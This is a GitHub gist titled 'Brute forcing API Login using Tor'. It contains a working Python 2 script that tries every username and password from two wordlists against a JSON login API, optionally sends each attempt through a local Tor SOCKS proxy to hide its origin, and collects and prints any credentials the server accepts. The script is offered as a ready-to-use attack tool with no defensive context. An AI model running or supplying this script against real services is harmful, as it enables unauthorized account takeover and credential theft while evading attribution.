Created
April 25, 2018 14:49
-
-
Save davidtavarez/c7e56a894ab2853ed7a33b178e42e45b to your computer and use it in GitHub Desktop.
Brute forcing API Login using Tor
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# coding=utf-8 | |
import requests | |
def brute(api_url, users_file, passwords_file, validation_errors, use_tor): | |
proxy_address = '127.0.0.1' | |
proxy_port = 9050 | |
valid_credentials = [] | |
users = [line.rstrip('\n') for line in open(users_file)] | |
passwords = [line.rstrip('\n') for line in open(passwords_file)] | |
for user in users: | |
print 'Brute forcing user: {}'.format(user) | |
for password in passwords: | |
authentication = {'user_name': user, 'password': password} | |
session = requests.session() | |
if use_tor: | |
session.proxies = {'http': "socks5h://{}:{}".format(proxy_address, proxy_port), | |
'https': "socks5h://{}:{}".format(proxy_address, proxy_port)} | |
attempt = session.post(url=api_url, json=authentication, | |
headers={'Accept': 'application/json', 'Content-Type': 'application/json'}) | |
response = attempt.json() | |
if response['message'] not in validation_errors: | |
valid_credentials.append({'user': user, 'password': password}) | |
return valid_credentials | |
if __name__ == "__main__": | |
url = 'http://api/login' | |
user_list = 'users.txt' | |
passwords_list = 'passwords.txt' | |
error_messages = {u'error 1', | |
u'error 2'} | |
credentials = brute(api_url=url, users_file=user_list, passwords_file=passwords_list, | |
validation_errors=error_messages, use_tor=True) | |
if len(credentials) > 0: | |
print 'Valid credentials found:' | |
for credential in credentials: | |
print '{}:{}'.format(credential['user'], credential['password']) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment